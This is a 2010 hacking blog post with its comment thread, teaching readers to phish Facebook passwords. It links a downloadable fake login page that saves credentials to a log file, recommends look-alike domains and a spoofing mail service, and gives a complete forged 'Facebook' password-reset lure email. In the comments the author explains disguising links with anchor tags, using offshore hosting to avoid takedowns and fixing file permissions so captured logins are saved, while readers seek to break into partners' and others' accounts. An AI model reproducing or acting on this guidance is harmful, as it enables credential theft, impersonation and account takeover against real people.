Sunday, August 1, 2010

Art Of Hacking [Exposed] ! - Web Based Hacking[1]:Phishing

Hii there,
  so as i said here i'm to continue with EXPANDED explanations for each of techniques used in web based hacking.
again just to remind that *i dont have the responsibility on what you do with this information; so dont misuse it*

So it phishing, there are several ways of phishing. But the most easiest and the common is using fake login pages. So lets go on with it first:

[i] Fake Login Pages:

--Phishing a facebook account

Requirements:
         *Fake FB Login page
         *Web host
         *Fake Mailer
         *Creativity
      
1) Creating the fake fb page:
  For this i have made a page for you so you need not to waste time on it, but making it yourself will satisfy you :)
So the tech behind this is to COPY the LOGIN PAGE exactly and then simple change the login button action to log the entered email n pwd. In the version i made, i made it so that it will log the things to log.txt and redirect use to the real login page of facebook so no Suspicions :);!

http://d01.megashares.com/dl/a8OL7s5/fbFake.zip

 OK, you have it now, what next?

2)The web host..
 Now you need to uplaod this fake login to a web host so that you can direct a your target to it. You can use any host with php support and even 10mb space is engouh. Make sure it's ad-free So you have now upladed it!

How it looks like after uploading?

ok that seems real but MAJOR PROB: the URL.. its not facebook but zoscio somthing (dont worry that our social site). So we have to have a solution for it.. use the frien of ours: the seconday domain (its good if you can afford for a top level one)
You can use something like faceboook.co.nr or something
but i used a different technique so that a secondary domain is not needed at all!

3) Fake Mailer
Now you need to send mail as another guy. So what to do? You can use fake mailing service
mine : Here

But keep in mind that the mail sent from this is going directly into the spam box in most cases cause the host is not certifie. There's a way of sending the genuine thing that i cannot write here (of corse it need a seperate manual of making your own email server)
so that part is up to you!

4) Creativity

NOW everything ok but wheres da mail to sent??
here it is: send the mail like this

Recep:
From: noreply@facebook.com
From Name: Facebook
Subject: Invalid Password Reset Request

BodY:
(i wrote this in html soo you have to retranslate it to html, cuz blogger translating my html into real thing :S :D)




Hey Manujith,


A password reset request has been recently made from your account.
It has been identified as an invalid attempt so that your password reset will not be proceeded until you follow the following link.



https://login.facebook.com/reset.php?email=manzzup%40gmail.com&n=05c4b988&s=1




Please read this carefully:
If you have not requested the password reset above, its likely to be a failed attempt by another person to access your account. So please visit the following link and confirm this as an invalid request.



https://login.facebook.com/cancelreq?10012143

No response with in 2 weeks of receiving this email would deactivate your Facebook account temporally for security reason.
https://login.facebook.com/reset.php?email=manzzup%40gmail.com&n=05c4b988&s=1


Thanks,
The Facebook Team

heres the preview when evrything done,


so thats it, user click any link goes to our FAKE page and login there
AURAAA we get the PWD :D

So i'll upload the fake pages for other email appslike (gmail, hotmail later)
Soo guyz i'll be back with another tut
till then Happy HAcking!

55 comments:

  1. hey..thanks for those informations...seems it will work..the problem is i cant download the FAKE FB PAGE that u given as a link.please help me.

    ReplyDelete
  2. Thanks for the info. But the links don't work can you fix them

    ReplyDelete
  3. information is awesome...but d links are not working dude/babes....plz fix em

    ReplyDelete
  4. heyy guys
    links okay now
    the login file link has some probs
    please read the instruction below it :D

    ReplyDelete
  5. help!!!
    i just made the webhost thing with zoka.cc but i dont no how to link the fake facebook folder i downloaded with it :(
    im reaaaaaal confused :(

    ReplyDelete
  6. never mind i worked it out and i did it on my sister as a test but dont no where to find the password :S

    ReplyDelete
  7. oi in dis url : http://zoscio.orgfree.com/
    'Warning: Suspected phishing site!
    The website at zoscio.orgfree.com has been reported as a “phishing” site. Phishing sites trick users into disclosing personal or financial information, often by pretending to represent trusted institutions, such as bank' msg is cmin

    ReplyDelete
  8. HELP ME PLEASE :(

    I am having a lot of difficulties setting this up, my free hosting site just keeps giving an error like:

    "Internet explorer has found the site, but cannot connect, you may have to login (error http 403"

    Please help, do u know of any servers I can use for free, as my future wife is cheating I am sure, but I need evidence before it's too late :(

    kiryrageb@gmail.com

    ReplyDelete
  9. sorry guys for the late reply

    @rebel
    you'll find your passwords in the log.txt in your root directory

    @kiryrageb

    403 if access problem
    you should change your host, try freezoka.net or zoka.cc both are very good

    But if you guys need phishing page for a long time, then you should look for Offshore hosting sites because by some chance, someone can report about your site.

    ReplyDelete
    Replies
    1. helppp, not getting any fake page on the given link, then how to download it?

      Delete
  10. Hi,

    When I try to send the e-mail, it sends me this message

    Unable to Send mail. There are other reasons why mail may not be delivered. Sorry - it's hard to be perfect with this sort of thing! -Abhishek
    Go Back.

    Also, how do I link up the downloaded facebook folder to the webhost?

    ReplyDelete
  11. "Hi, I Saw Your Link in Bing.com I Love Your Blogs Kindly See my Link Here a New Alternative Money Making Network alternative to adbrite here

    "

    ReplyDelete
  12. @Anynomous
    I'm really sorry bit lately the host i'm using has blocked the mail() function, i'll try updating the link
    by the time you can easily find an alternative by googling "fake mailers"

    And to put the files in your host, use FTP, in your web hosting control panel you will see something like "online FTP" and from that you can upload the zip file itself and then unzip it in the host

    @Asha
    =Thank you :D and yup your blog seems really informative a well :D

    ReplyDelete
  13. Hi, I Saw Your Link in Bing.com I Love Your Blogs Kindly See my Link Here a New Alternative Money Making Network alternative to adbrite here

    ReplyDelete
  14. Hi, just a question:
    How'd u make the links appear as:
    https://login.facebook.com/reset.php?email=manzzup%40gmail.com&n=05c4b988&s=1

    while they actually lead to somewhere else?

    ReplyDelete
  15. what offshore hosting can you recommend? your response is appreciated.:)

    ReplyDelete
  16. Q1: you need a bit of HTML
    ex: you if need http://google.com to go to
    http://hacker.com
    you do like,
    http://google.com
    this is called anchoring in html

    Q2: i havent used any service to recommned
    but http://www.securehost.com/, http://www.ccihosting.com/linux-servers.php?_kk=offshore%20hosting&_kt=25c859ce-9ef6-4fd6-9ba8-2c929d37070f&gclid=CNHv-q2UwqkCFYpA4Qod5goaEQ

    have good rating :D

    ReplyDelete
  17. sorry above the above post
    but i cannot post the source as i wish because of blogger limitations

    google for anchor tags for Q1

    ReplyDelete
    Replies
    1. please help me to hack account fb??? Pleaseee

      Delete
  18. The live demo no longer works as it is reported as Phishing site
    very sorry guyz

    ReplyDelete
  19. ManZzup - I just saw your blog here and I wanted to try it. So you are saying it wont work anymore at all. Can you halp me.
    I did downloade the *Fake FB Login page.
    Please help me.

    ReplyDelete
  20. once you download the the fake login page, make a website and upload the stuff directly into it
    the demo is not working but
    http://facbook.zoka.cc/
    would act as a demo for now :)

    ReplyDelete
    Replies
    1. How to download the fake login page? This is not showing anything :(

      Delete
    2. the link is kinda broken since most hosts keep removing it :S

      Delete
  21. Email me justinwoodson80@yahoo.com

    ReplyDelete
  22. Waw! good thing bro : )
    was having one problem.. I made a fake login page and imported it to a website.. and did a demo inserting email address and a password.. Then where am i supposed to see where the inserted password and email is stored in my web??

    ReplyDelete
  23. well i used x9x.net for the free webhosting

    ReplyDelete
  24. yup, you will a get file like log.txt which contains the email address followed by the password

    but be careful with your web site policy cause they can ban the demo page ;)

    ReplyDelete
  25. You replied really late ManZzup : p
    I am still confused... where can i meet you in msn, facebook??
    Please check your mail asap! i've mailed you..

    ReplyDelete
  26. Hey I seriously need help with all these steps my email address is qutpie1084@yahoo.com

    ReplyDelete
  27. hey manzzup can you email me and help me out with this. angus_gameover@hotmail.com

    ReplyDelete
  28. guys here please add me up on facebook or atleast twitter and put up a message because my mailbox is truely a spam box so i'm not watching it much ::)

    ReplyDelete
  29. How can I contact you on Facebook? how do I find you?

    ReplyDelete
  30. And what if I don't know the person's email? but they do have their facebook..?

    ReplyDelete
  31. facebook.com/manzzup
    well in that case, you will first make the person give his email to you [the easy way]
    or you could still do this in the chat, i mean yuou just have to change the layout of the phishing page to some other and make sure the guy login to his facebook account from your site

    ReplyDelete
  32. urgh! anyway you could do this for me..LOST
    ciao847@yahoo.com

    ReplyDelete
  33. Would this trick (fake page) work on mobile devices?

    ReplyDelete
  34. yeah it will work if the page is designed correctly

    ReplyDelete
  35. thanks for reply!
    I don't have his email id.. but do have his username?
    what do i do?

    ReplyDelete
  36. well you can get a different approach
    ex: a survey page that need to sign in with fb id
    the same theory is behind, catching the target is all about your creativity :D

    ReplyDelete
  37. HEY HACK THIS ACCOUNT FOR ME PLZ I NEED THE PASSOWRD IM LOST DOING ALL THIS HACKING STUFF HELP PLZ

    tarikstephenson@gmail.com

    ReplyDelete
  38. i also tried adding you on facebook this is the person email

    tarikstephenson@gmail.com

    email it too me plz

    WastedKid101@gmail.com

    ReplyDelete
  39. you are amazing,,i added you on facebook =]

    ReplyDelete
  40. Please save my life, someone is blackmailing me with the messages I sent, I don't wanna make my parents sick by the messages as a person cheated on me and this message is all about it. Also it is being forward. I just need to delete only my messages, and facebook doesn't allow people to do so even after deleteing own account forever. And so I need to hack the account just to delete only these, not gonna do any illegal thing. Also the email addresses are hidden, so I don't know any email address or password, just know their facebook name which is searchable. Pls help me step by step and save my life.

    ReplyDelete
  41. Manzzup, also I don't have enough time, I have to do it within 2-4days, please help mee

    ReplyDelete
  42. Please save my life, someone is blackmailing me with the messages I sent, I don't wanna make my parents sick by the messages as a person cheated on me and this message is all about it. Also it is being forward. I just need to delete only my messages, and facebook doesn't allow people to do so even after deleteing own account forever. And so I need to hack the account just to delete only these, not gonna do any illegal thing. Also the email addresses are hidden, so I don't know any email address or password, just know their facebook name which is searchable. Pls help me step by step and save my life. Manzzup, also I don't have enough time, I have to do it within 2-4days, please help mee

    ReplyDelete
  43. @lara thankxx i added ya
    @anonymous
    sorry guys ive been off da machine for some days
    ill check the broken links and update quickly
    @sorrow
    well i can help to guide you through the steps
    but remember this isnt a very feasble method to get result in a short time
    there's always a chance but erm it does work often :)

    ReplyDelete
  44. ALL links except the live demo is updated
    i will put up the demo ASA i found a host that allows the stuff :S

    ReplyDelete
  45. Hey manzzup im having a problem that passwords and email addresses are not shown in log.txt plz help me!!!!!

    ReplyDelete
  46. did you CHMID the log.txt to 777 frst?
    most servers dont allow the file to be written unless the necesary permission are given

    ReplyDelete
  47. HI, I uploaded all the file to a web host that I am using. And I tested the page with my own account, but I couldn't find the log in information (User name and password) in the log.txt file.

    ReplyDelete
  48. possible reason is that you didnt give the necessary write permissions to the file
    from your ftp software right click the log.txt and select CHMOD [it might be under properties] and put the value to 777 and update

    ReplyDelete
  49. If i give you the email of the person i want the password for could you do it for me please and give me the password? I cant seem to set it up at all and i really need this persons password, could you help me please?

    ReplyDelete